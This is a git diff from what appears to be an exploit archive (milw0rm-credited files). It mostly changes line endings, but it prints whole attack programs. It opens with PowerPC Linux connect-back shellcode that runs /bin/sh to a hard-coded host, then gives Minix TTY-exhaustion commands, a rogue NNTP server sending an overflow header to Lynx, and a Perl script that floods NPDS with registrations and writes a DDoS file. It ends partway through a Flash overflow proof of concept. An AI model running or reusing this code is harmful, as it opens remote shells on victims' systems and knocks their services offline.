Here's an example +// core@morpheus:~$ printf "0x%02x%02x\n0x%02x%02x\n" 192 168 1 1 +// 0xc0a8 +// 0x0101 +"\x63\xbd" /* PORT # */ "\x7a\x69" /*ori r29,r29,31337*/ +"\xb3\xbe\xff\x18" /*sth r29,-232(r30)*/ +"\x3f\xa0" /*IP(A.B) */ "\xc0\xa8" /*lis r29,-16216*/ +"\x63\xbd" /*IP(C.D) */ "\x01\x01" /*ori r29,r29,257*/ +"\x93\xbe\xff\x1a" /*stw r29,-230(r30)*/ +"\x93\x1c\xff\x08" /*stw r24,-248(r28)*/ +"\x3a\xde\xff\x16" /*addi r22,r30,-234*/ +"\x92\xdc\xff\x0c" /*stw r22,-244(r28)*/ +"\x3b\xa0\x01\x1c" /*li r29,284*/ +"\x38\xbd\xfe\xf4" /*addi r5,r29,-268*/ +"\x90\xbc\xff\x10" /*stw r5,-240(r28)*/ +"\x7f\x20\x16\x70" /*srawi r0,r25,2*/ +"\x7c\x7a\xda\x14" /*add r3,r26,r27*/ +"\x38\x9c\xff\x08" /*addi r4,r28,-248*/ +"\x44\xde\xad\xf2" /*.long0x44deadf2*/ +"\x7f\x03\xc3\x78" /*mr r3,r24*/ +"\x7c\x84\x22\x78" /*xor r4,r4,r4*/ +"\x3a\xe0\x01\xf8" /*li r23,504*/ +"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ +"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ +"\x7f\x03\xc3\x78" /*mr r3,r24*/ +"\x7f\x64\xdb\x78" /*mr r4,r27*/ +"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ +"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ +// comment out the next 4 lines to save 16 bytes and lose stderr +//"\x7f\x03\xc3\x78" /*mr r3,r24*/ +//"\x7f\x44\xd3\x78" /*mr r4,r26*/ +//"\x7e\xe0\x1e\x70" /*srawi r0,r23,3*/ +//"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ +"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/ +"\x42\x40\xff\x35" /*bdzl+ 10000454
*/ +"\x7f\x08\x02\xa6" /*mflr r24*/ +"\x3b\x18\x01\x34" /*addi r24,r24,308*/ +"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/ +"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/ +"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/ +"\x38\x81\xff\xf8" /*addi r4,r1,-8*/ +"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/ +"\x3b\xc0\x01\x60" /*li r30,352*/ +"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/ +"\x44\xde\xad\xf2" /*.long 0x44deadf2*/ +"/bin/shZ"; /* Z will become NULL */ + +int main(void) +{ + void (*shell)() = (void *)&hellcode; + printf("%d byte connect back execve /bin/sh for linux/ppc by core\n", + strlen(hellcode)); + shell(); + return 0; +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/linux_ppc/shellcode/13304.c b/platforms/linux_ppc/shellcode/13304.c index 863ce2bf5..5d84ff535 100755 --- a/platforms/linux_ppc/shellcode/13304.c +++ b/platforms/linux_ppc/shellcode/13304.c @@ -65,6 +65,6 @@ void main() .Lfe1: .size m,.Lfe1-m -*/ - +*/ + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/linux_sparc/shellcode/13305.c b/platforms/linux_sparc/shellcode/13305.c index 9e195ee8f..625dd3b5d 100755 --- a/platforms/linux_sparc/shellcode/13305.c +++ b/platforms/linux_sparc/shellcode/13305.c @@ -99,6 +99,6 @@ main() ********************************************************************************/ -//EOF - +//EOF + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/linux_sparc/shellcode/13306.c b/platforms/linux_sparc/shellcode/13306.c index 0e8770666..7ad5131e2 100755 --- a/platforms/linux_sparc/shellcode/13306.c +++ b/platforms/linux_sparc/shellcode/13306.c @@ -101,6 +101,6 @@ main() // test that techno-devil! } -/* EOF */ - +/* EOF */ + // milw0rm.com [2004-09-12] \ No newline at end of file diff --git a/platforms/minix/dos/6120.txt b/platforms/minix/dos/6120.txt index 818f359a2..3ba39fb26 100755 --- a/platforms/minix/dos/6120.txt +++ b/platforms/minix/dos/6120.txt 
@@ -1,28 +1,28 @@
-# kokanin@gmail 20080723
-# minix 3.1.2a tty panic
-
-trunk/src/drivers/tty/tty.c
-
- 14965 if ((status = send(replyee, &tty_mess)) != OK) {
- 14966 panic("TTY","tty_reply failed, status\n", status);
-
-$ uname -a
-Minix 192.168.1.2 3 1.2a i686
-$ while true ; do (yes "yes yes minix uh ah"&) ; done
-[snip snip]
-$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C
-
-...disconnected
-
-telnet 192.168.1.2
-Trying 192.168.1.2...
-Connected to 192.168.1.2.
-Escape character is '^]'.
-I am sorry, but there is no free PTY left!
-Connection closed by foreign host.
-
-hai, no moar pty, kthxbye
---
-kokanin
-
-# milw0rm.com [2008-07-23]
+# kokanin@gmail 20080723
+# minix 3.1.2a tty panic
+
+trunk/src/drivers/tty/tty.c
+
+ 14965 if ((status = send(replyee, &tty_mess)) != OK) {
+ 14966 panic("TTY","tty_reply failed, status\n", status);
+
+$ uname -a
+Minix 192.168.1.2 3 1.2a i686
+$ while true ; do (yes "yes yes minix uh ah"&) ; done
+[snip snip]
+$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C
+
+...disconnected
+
+telnet 192.168.1.2
+Trying 192.168.1.2...
+Connected to 192.168.1.2.
+Escape character is '^]'.
+I am sorry, but there is no free PTY left!
+Connection closed by foreign host.
+
+hai, no moar pty, kthxbye
+--
+kokanin
+
+# milw0rm.com [2008-07-23]
diff --git a/platforms/minix/dos/6129.txt b/platforms/minix/dos/6129.txt
index 5eb8e8863..73d5bafa1 100755
--- a/platforms/minix/dos/6129.txt
+++ b/platforms/minix/dos/6129.txt
@@ -1,21 +1,21 @@
-# kokanin@gmail 20080724
-# minix 3.1.2a remote tty panic
-
-trunk/src/drivers/tty/tty.c
-
- 14965 if ((status = send(replyee, &tty_mess)) != OK) {
- 14966 panic("TTY","tty_reply failed, status\n", status);
-
-
-$ (while true ; do sleep 1 && killall nc 2>/dev/null; done) &
-$ while true ; do cat /dev/urandom | nc 192.168.1.42 23 ; done
-[snip garbage]
-I am sorry, but there is no free PTY left!
-$ fg
-$ ^C
-
-hai, no moar pty, remotely, kthxbye
---
-kokanin
-
-# milw0rm.com [2008-07-25]
+# kokanin@gmail 20080724
+# minix 3.1.2a remote tty panic
+
+trunk/src/drivers/tty/tty.c
+
+ 14965 if ((status = send(replyee, &tty_mess)) != OK) {
+ 14966 panic("TTY","tty_reply failed, status\n", status);
+
+
+$ (while true ; do sleep 1 && killall nc 2>/dev/null; done) &
+$ while true ; do cat /dev/urandom | nc 192.168.1.42 23 ; done
+[snip garbage]
+I am sorry, but there is no free PTY left!
+$ fg
+$ ^C
+
+hai, no moar pty, remotely, kthxbye
+--
+kokanin
+
+# milw0rm.com [2008-07-25]
diff --git a/platforms/multiple/dos/1008.c b/platforms/multiple/dos/1008.c
index 4b273d2d1..ee036af8c 100755
--- a/platforms/multiple/dos/1008.c
+++ b/platforms/multiple/dos/1008.c
@@ -250,6 +250,6 @@ return (1); close(sock); printf("done\n"); return (0); -} - -// milw0rm.com [2005-05-21] +} + +// milw0rm.com [2005-05-21]
diff --git a/platforms/multiple/dos/1037.c b/platforms/multiple/dos/1037.c
index 27bcdf5c2..6353f3bf8 100755
--- a/platforms/multiple/dos/1037.c
+++ b/platforms/multiple/dos/1037.c
@@ -355,6 +355,6 @@ fprintf(stderr, " [-a Path Attributes] [-A Attribute Length]\n" " [-i Reachability Information] [-I Reachability Information length]\n", name); -} - -// milw0rm.com [2005-06-09] +} + +// milw0rm.com [2005-06-09]
diff --git a/platforms/multiple/dos/1056.pl b/platforms/multiple/dos/1056.pl
index cc87029fb..5cc2b9191 100755
--- a/platforms/multiple/dos/1056.pl
+++ b/platforms/multiple/dos/1056.pl
@@ -49,6 +49,6 @@ $buf.=$buf2."\r\n\r\n"; send($sock,$buf,0) || die "send error:$@\n"; print "Ok, the buffer sent to the target \n"; -close($sock); - -# milw0rm.com [2005-06-20] +close($sock); + +# milw0rm.com [2005-06-20] diff --git a/platforms/multiple/dos/1176.c b/platforms/multiple/dos/1176.c index 7fa8a4fc6..28f377d92 100755 --- a/platforms/multiple/dos/1176.c +++ b/platforms/multiple/dos/1176.c @@ -565,6 +565,6 @@ u_int resolv(char *host) { perror("\nError"); exit(1); } -#endif - -// milw0rm.com [2005-08-23] +#endif + +// milw0rm.com [2005-08-23] diff --git a/platforms/multiple/dos/1204.html b/platforms/multiple/dos/1204.html index fc6d3847a..285c65da4 100755 --- a/platforms/multiple/dos/1204.html +++ b/platforms/multiple/dos/1204.html @@ -1,4 +1,3 @@ - - -# milw0rm.com [2005-09-09] + +# milw0rm.com [2005-09-09] diff --git a/platforms/multiple/dos/1213.c b/platforms/multiple/dos/1213.c index a05a4555c..878214b47 100755 --- a/platforms/multiple/dos/1213.c +++ b/platforms/multiple/dos/1213.c @@ -1,4 +1,3 @@ - /*_------------------------------------------_ ||------+ Snort <= 2.4.0 Trigger p0c +------|| ||__________________________________________|| @@ -165,6 +164,6 @@ int main(int argc, char **argv) close(sockfd); return 0; -} - -// milw0rm.com [2005-09-12] +} + +// milw0rm.com [2005-09-12] diff --git a/platforms/multiple/dos/1254.html b/platforms/multiple/dos/1254.html index 51e10cf33..27bbbe01a 100755 --- a/platforms/multiple/dos/1254.html +++ b/platforms/multiple/dos/1254.html @@ -1,11 +1,11 @@ - - -AA
A
- -# milw0rm.com [2005-10-16] + + +AA
A
+ +# milw0rm.com [2005-10-16] diff --git a/platforms/multiple/dos/1256.pl b/platforms/multiple/dos/1256.pl index c71b670e8..0622e2f9b 100755 --- a/platforms/multiple/dos/1256.pl +++ b/platforms/multiple/dos/1256.pl 
@@ -1,111 +1,111 @@ -#!/usr/bin/perl -- - -# lynx-nntp-server -# by Ulf Harnhammar in 2005 -# I hereby place this program in the public domain. - -use strict; -use IO::Socket; - -$main::port = 119; -$main::timeout = 5; - -# *** SUBROUTINES *** - -sub mysend($$) -{ -my $file = shift; -my $str = shift; - -print $file "$str\n"; -print "SENT: $str\n"; -} # sub mysend - -sub myreceive($) -{ -my $file = shift; -my $inp; - -eval -{ -local $SIG{ALRM} = sub { die "alarm\n" }; -alarm $main::timeout; -$inp = <$file>; -alarm 0; -}; - -if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; } -$inp =~ tr/\015\012\000//d; -print "RECEIVED: $inp\n"; -$inp; -} # sub myreceive - -# *** MAIN PROGRAM *** - -{ -my $server = IO::Socket::INET->new( Proto => 'tcp', -LocalPort => $main::port, -Listen => SOMAXCONN, -Reuse => 1); -die "can't set up server!\n" unless $server; - - -while (my $client = $server->accept()) -{ -$client->autoflush(1); -print 'connection from '.$client->peerhost."\n"; - - -mysend($client, '200 Internet News'); -my $group = 'alt.angst'; - -while (my $str = myreceive($client)) -{ -if ($str =~ m/^mode reader$/i) -{ -mysend($client, '200 Internet News'); -next; -} - -if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i) -{ -$group = $1; -mysend($client, "211 1 1 1 $group"); -next; -} - -if ($str =~ m/^quit$/i) -{ -mysend($client, '205 Goodbye'); -last; -} - -if ($str =~ m/^head ([0-9]+)$/i) -{ -my $evil = '$@UU(JUU' x 21; # Edit the number! -$evil .= 'U' x (504 - length $evil); - -my $head = < -Path: host!someotherhost!onemorehost -From: -Subject: $evil -Newsgroup: $group -Message-ID: -. -HERE - -$head =~ s|\s+$||s; -mysend($client, $head); -next; -} - -mysend($client, '500 Syntax Error'); -} # while str=myreceive(client) - -close $client; -print "closed\n\n\n"; -} # while client=server->accept() -} - -# milw0rm.com [2005-10-17] +#!/usr/bin/perl -- + +# lynx-nntp-server +# by Ulf Harnhammar in 2005 +# I hereby place this program in the public domain. 
+ +use strict; +use IO::Socket; + +$main::port = 119; +$main::timeout = 5; + +# *** SUBROUTINES *** + +sub mysend($$) +{ +my $file = shift; +my $str = shift; + +print $file "$str\n"; +print "SENT: $str\n"; +} # sub mysend + +sub myreceive($) +{ +my $file = shift; +my $inp; + +eval +{ +local $SIG{ALRM} = sub { die "alarm\n" }; +alarm $main::timeout; +$inp = <$file>; +alarm 0; +}; + +if ($@ eq "alarm\n") { $inp = ''; print "TIMED OUT\n"; } +$inp =~ tr/\015\012\000//d; +print "RECEIVED: $inp\n"; +$inp; +} # sub myreceive + +# *** MAIN PROGRAM *** + +{ +my $server = IO::Socket::INET->new( Proto => 'tcp', +LocalPort => $main::port, +Listen => SOMAXCONN, +Reuse => 1); +die "can't set up server!\n" unless $server; + + +while (my $client = $server->accept()) +{ +$client->autoflush(1); +print 'connection from '.$client->peerhost."\n"; + + +mysend($client, '200 Internet News'); +my $group = 'alt.angst'; + +while (my $str = myreceive($client)) +{ +if ($str =~ m/^mode reader$/i) +{ +mysend($client, '200 Internet News'); +next; +} + +if ($str =~ m/^group ([-_.a-zA-Z0-9]+)$/i) +{ +$group = $1; +mysend($client, "211 1 1 1 $group"); +next; +} + +if ($str =~ m/^quit$/i) +{ +mysend($client, '205 Goodbye'); +last; +} + +if ($str =~ m/^head ([0-9]+)$/i) +{ +my $evil = '$@UU(JUU' x 21; # Edit the number! +$evil .= 'U' x (504 - length $evil); + +my $head = < +Path: host!someotherhost!onemorehost +From: +Subject: $evil +Newsgroup: $group +Message-ID: +. +HERE + +$head =~ s|\s+$||s; +mysend($client, $head); +next; +} + +mysend($client, '500 Syntax Error'); +} # while str=myreceive(client) + +close $client; +print "closed\n\n\n"; +} # while client=server->accept() +} + +# milw0rm.com [2005-10-17] diff --git a/platforms/multiple/dos/1268.pl b/platforms/multiple/dos/1268.pl index 5c415887e..d69ec868c 100755 --- a/platforms/multiple/dos/1268.pl +++ b/platforms/multiple/dos/1268.pl 
@@ -1,141 +1,141 @@ -#!/usr/bin/perl -################################################################ -#Type|+ Register multiple users for Denial of Service -#Vendor url|+ www.npds.org -#Little description|+ NPDS (Net Portal Dynamic System) is a French(and now English !) GNU dynamic portal -#Solution|+ None official but you can add a visual confirmation if you like php ;) -#Worked on|+ Last version(5.0, tested), probably prior -#Files|+ Exploit=npds50.pl Bind=malicious_npds.pl Log=log_npds_dos.txt -#Credits|+ Vulnerability find and coded by DarkFig -#Greetz|+ Acid root, [*BoD*] , Milw0rm.com (best website in the world !!) and all people who know me ;) -#Note|+ Bind option if for DDoS attack | If the website send password to the email no registration but it add an email in the database (can make Dos !) ;) | Sorry for my bad english ^^ -################################################################ -use IO::Socket; -if (@ARGV < 7) { -print q( -+------------------------------------------------------------------------+ -+ Net Portal Dynamic System <5.0 + -+ Register multiple users Denial of Service + -+------------------------------------------------------------------------+ -+ Usage|npds50.pl + -+------------------------------------------------------------------------+ -+ => Website send password to the email ? 
[Yes=1] [No=0] + -+ => The port of the website (default is 80) + -+ => Number of registration [Infinite=loop] + -+ => Log activity in a file [Yes=1] [No=0] + -+ => Generate a malicious file for DDOS [Yes=1] [No=0] + -+------------------------------------------------------------------------+ -+ Found and coded by DarkFig + -+------------------------------------------------------------------------+ -); exit();} - -#Initializing data -$host = $ARGV[0]; -$path = $ARGV[1]; -$port = $ARGV[2]; -$sendpwd = $ARGV[3]; -$nb_reg = $ARGV[4]; -$log = $ARGV[5]; -$bind = $ARGV[6]; -$x = 0; -if($nb_reg eq "loop") {$nb_reg = "-5";} - -#If bind=yes -if($bind eq "1") { -print q( -+-----------------------------------+ -+ Net Portal Dynamic System <5.0 + -+ Register multiple users for DoS + -+ Found and coded by DarkFig + -+-----------------------------------+); -print "\n [+] Generate a malicious file..."; -open FILE, ">malicious_npds.pl"; -print FILE "use IO::Socket;"; -print FILE "\n"; print FILE q($log = "); print FILE "$log"; print FILE q(";); -print FILE "\n"; print FILE q($host = "); print FILE "$host"; print FILE q(";); -print FILE "\n"; print FILE q($port = ); print FILE "$port;"; -print FILE "\n"; print FILE q($nb_reg = ); print FILE "$nb_reg;"; -print FILE "\n"; print FILE q($path = "); print FILE "$path"; print FILE q(";); -print FILE "\n"; print FILE q($x = 0;); -print FILE "\n"; print FILE q(if($nb_reg eq "loop"){$nb_reg = "-5";}); -print FILE "\n"; -print FILE q(while($x != $nb_reg) { -$email = "godman"."$x"."%40hotmail.com"; -$pseudo = "0rrn"."$x"."&"; -$password = "g0_odp4sswd"; -); -if($sendpwd eq "0"){print FILE q($full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&pass="."$password"."&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";);} -if($sendpwd eq 
"1"){print FILE q($full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";);} -print FILE q( -my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "$port",Proto => "tcp",); -die "\n[-] Can't connect to the host, maybe Dosed !\n" unless $sock; -print $sock "GET $full_url HTTP/1.1\n"; -print $sock "Host: $host\n"; -close($sock); -if($log eq "1") { -open FILE, ">log_npds_dos.txt"; -print FILE q( -+-----------------------------------+ -+ Net Portal Dynamic System <5.0 + -+ Register multiple users for DoS + -+ ~~Activity logged~~ + -+-----------------------------------+); -print FILE "\n Host| $host"; -print FILE "\n Path| $path"; -print FILE "\n Port| $port"; -print FILE "\n Registration| $x"; -print FILE "\n+-----------------------------------+"; -print FILE "\n+ Logged by DarkFig +"; -print FILE "\n+-----------------------------------+"; -close FILE;} -$x++; -syswrite STDOUT, "-$x";}); close FILE; -print "\n [+] Malicious file generate !"; -print "\n+-----------------------------------+\n"; -exit();} - -#If bind=no -if($bind eq "0") { -print q( -+-----------------------------------+ -+ Net Portal Dynamic System <5.0 + -+ Register multiple users for DoS + -+ Found and coded by DarkFig + -+-----------------------------------+); -print "\n[~] Connecting to the host.."; -my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "$port",Proto => "tcp",); -die "\n[-] Can't connect to the host: $!\n" unless $sock; close($sock); -print "\n[+] Connected !"; -print "\n[~] Sending data..."; -print "\n[+] Number of registration\n"; -while($x != $nb_reg) { -$email = "ownv"."$x"."%40hotmail.com"; -$pseudo = "0orn"."$x"."&"; -$password = "g0_odp4sswd"; -if($sendpwd eq "0"){$full_url = 
"$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&pass="."$password"."&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";} -if($sendpwd eq "1"){$full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";} -my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "$port",Proto => "tcp",); -die "\n[-] Can't connect to the host, maybe Dosed !\n" unless $sock; -print $sock "GET $full_url HTTP/1.1\n"; -print $sock "Host: $host\n"; -close($sock); -if($log eq "1") { -open FILE, ">log_npds_dos.txt"; -print FILE q( -+-----------------------------------+ -+ Net Portal Dynamic System <5.0 + -+ Register multiple users for DoS + -+ ~~Activity logged~~ + -+-----------------------------------+); -print FILE "\n Host| $host"; -print FILE "\n Path| $path"; -print FILE "\n Port| $port"; -print FILE "\n Registration| $x"; -print FILE "\n+-----------------------------------+"; -print FILE "\n+ Logged by DarkFig +"; -print FILE "\n+-----------------------------------+"; -close FILE;} -$x++; -syswrite STDOUT, "-$x";}} - -# milw0rm.com [2005-10-21] +#!/usr/bin/perl +################################################################ +#Type|+ Register multiple users for Denial of Service +#Vendor url|+ www.npds.org +#Little description|+ NPDS (Net Portal Dynamic System) is a French(and now English !) 
GNU dynamic portal +#Solution|+ None official but you can add a visual confirmation if you like php ;) +#Worked on|+ Last version(5.0, tested), probably prior +#Files|+ Exploit=npds50.pl Bind=malicious_npds.pl Log=log_npds_dos.txt +#Credits|+ Vulnerability find and coded by DarkFig +#Greetz|+ Acid root, [*BoD*] , Milw0rm.com (best website in the world !!) and all people who know me ;) +#Note|+ Bind option if for DDoS attack | If the website send password to the email no registration but it add an email in the database (can make Dos !) ;) | Sorry for my bad english ^^ +################################################################ +use IO::Socket; +if (@ARGV < 7) { +print q( ++------------------------------------------------------------------------+ ++ Net Portal Dynamic System <5.0 + ++ Register multiple users Denial of Service + ++------------------------------------------------------------------------+ ++ Usage|npds50.pl + ++------------------------------------------------------------------------+ ++ => Website send password to the email ? 
[Yes=1] [No=0] + ++ => The port of the website (default is 80) + ++ => Number of registration [Infinite=loop] + ++ => Log activity in a file [Yes=1] [No=0] + ++ => Generate a malicious file for DDOS [Yes=1] [No=0] + ++------------------------------------------------------------------------+ ++ Found and coded by DarkFig + ++------------------------------------------------------------------------+ +); exit();} + +#Initializing data +$host = $ARGV[0]; +$path = $ARGV[1]; +$port = $ARGV[2]; +$sendpwd = $ARGV[3]; +$nb_reg = $ARGV[4]; +$log = $ARGV[5]; +$bind = $ARGV[6]; +$x = 0; +if($nb_reg eq "loop") {$nb_reg = "-5";} + +#If bind=yes +if($bind eq "1") { +print q( ++-----------------------------------+ ++ Net Portal Dynamic System <5.0 + ++ Register multiple users for DoS + ++ Found and coded by DarkFig + ++-----------------------------------+); +print "\n [+] Generate a malicious file..."; +open FILE, ">malicious_npds.pl"; +print FILE "use IO::Socket;"; +print FILE "\n"; print FILE q($log = "); print FILE "$log"; print FILE q(";); +print FILE "\n"; print FILE q($host = "); print FILE "$host"; print FILE q(";); +print FILE "\n"; print FILE q($port = ); print FILE "$port;"; +print FILE "\n"; print FILE q($nb_reg = ); print FILE "$nb_reg;"; +print FILE "\n"; print FILE q($path = "); print FILE "$path"; print FILE q(";); +print FILE "\n"; print FILE q($x = 0;); +print FILE "\n"; print FILE q(if($nb_reg eq "loop"){$nb_reg = "-5";}); +print FILE "\n"; +print FILE q(while($x != $nb_reg) { +$email = "godman"."$x"."%40hotmail.com"; +$pseudo = "0rrn"."$x"."&"; +$password = "g0_odp4sswd"; +); +if($sendpwd eq "0"){print FILE q($full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&pass="."$password"."&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";);} +if($sendpwd eq 
"1"){print FILE q($full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";);} +print FILE q( +my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "$port",Proto => "tcp",); +die "\n[-] Can't connect to the host, maybe Dosed !\n" unless $sock; +print $sock "GET $full_url HTTP/1.1\n"; +print $sock "Host: $host\n"; +close($sock); +if($log eq "1") { +open FILE, ">log_npds_dos.txt"; +print FILE q( ++-----------------------------------+ ++ Net Portal Dynamic System <5.0 + ++ Register multiple users for DoS + ++ ~~Activity logged~~ + ++-----------------------------------+); +print FILE "\n Host| $host"; +print FILE "\n Path| $path"; +print FILE "\n Port| $port"; +print FILE "\n Registration| $x"; +print FILE "\n+-----------------------------------+"; +print FILE "\n+ Logged by DarkFig +"; +print FILE "\n+-----------------------------------+"; +close FILE;} +$x++; +syswrite STDOUT, "-$x";}); close FILE; +print "\n [+] Malicious file generate !"; +print "\n+-----------------------------------+\n"; +exit();} + +#If bind=no +if($bind eq "0") { +print q( ++-----------------------------------+ ++ Net Portal Dynamic System <5.0 + ++ Register multiple users for DoS + ++ Found and coded by DarkFig + ++-----------------------------------+); +print "\n[~] Connecting to the host.."; +my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "$port",Proto => "tcp",); +die "\n[-] Can't connect to the host: $!\n" unless $sock; close($sock); +print "\n[+] Connected !"; +print "\n[~] Sending data..."; +print "\n[+] Number of registration\n"; +while($x != $nb_reg) { +$email = "ownv"."$x"."%40hotmail.com"; +$pseudo = "0orn"."$x"."&"; +$password = "g0_odp4sswd"; +if($sendpwd eq "0"){$full_url = 
"$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&pass="."$password"."&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";} +if($sendpwd eq "1"){$full_url = "$path"."user.php"."?op=only_newuser&uname="."$pseudo"."name=&email="."$email"."&user_avatar=blank.gif&user_icq=&url=&user_from=&user_occ=&user_intrest=&user_sig=&user_aim=&user_yim=&user_msnm=&user_viewemail=&user_lnl=1&C1=&C2=&C3=&C4=&C5=&C6=&C7=&C8=&M1=&M2=&T1=17%2F10%2F2005&T2=&B1=&op=finish";} +my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "$port",Proto => "tcp",); +die "\n[-] Can't connect to the host, maybe Dosed !\n" unless $sock; +print $sock "GET $full_url HTTP/1.1\n"; +print $sock "Host: $host\n"; +close($sock); +if($log eq "1") { +open FILE, ">log_npds_dos.txt"; +print FILE q( ++-----------------------------------+ ++ Net Portal Dynamic System <5.0 + ++ Register multiple users for DoS + ++ ~~Activity logged~~ + ++-----------------------------------+); +print FILE "\n Host| $host"; +print FILE "\n Path| $path"; +print FILE "\n Port| $port"; +print FILE "\n Registration| $x"; +print FILE "\n+-----------------------------------+"; +print FILE "\n+ Logged by DarkFig +"; +print FILE "\n+-----------------------------------+"; +close FILE;} +$x++; +syswrite STDOUT, "-$x";}} + +# milw0rm.com [2005-10-21] diff --git a/platforms/multiple/dos/1331.c b/platforms/multiple/dos/1331.c index 30e00f53a..2ef892cd4 100755 --- a/platforms/multiple/dos/1331.c +++ b/platforms/multiple/dos/1331.c 
@@ -1,91 +1,91 @@ -/* - - * ********************************************************* * - * Macromedia Flash Plugin - Buffer Overflow in flash.ocx * - * ********************************************************* * - * Version: v7.0.19.0 * - * PoC coded by: BassReFLeX * - * Date: 11 Oct 2005 * - * ********************************************************* * - -*/ - -#include -#include -#include - -void usage(char* file); - -/* - -... - -*/ -char SWF[] = ""; -char SWF_[] = ""; - -//[SetBackgroundColor] -char SetBackgroundColor[] = "\x43\x02\xff\x00\x00"; - -//[DoAction] 1 pwn j00r 455! -char DoAction[] = "\x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00" - "\x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43" - "\x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45" - "\x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00"; - -//[ShowFrame] -char ShowFrame[] = "\x40\x00"; - -//[End] -char End[] = "\x00\x00"; - -int main(int argc,char* argv[]) -{ - system("cls"); - printf("\n* ********************************************************* *"); - printf("\n* Macromedia Flash Plugin - Buffer Overflow in flash.ocx *"); - printf("\n* ********************************************************* *"); - printf("\n* Version: v7.0.19.0 *"); - printf("\n* Date: 11 Oct 2005 *"); - printf("\n* ProofOfConcept(POC) coded by: BassReFLeX *"); - printf("\n* ********************************************************* *"); - - if ( argc!=2 ) - { - usage(argv[0]); - } - - FILE *f; - f = fopen(argv[1],"w"); - if ( !f ) - { - printf("\nFile couldn't open!"); - exit(1); - } - - printf("\n\nWriting crafted .swf file . . 
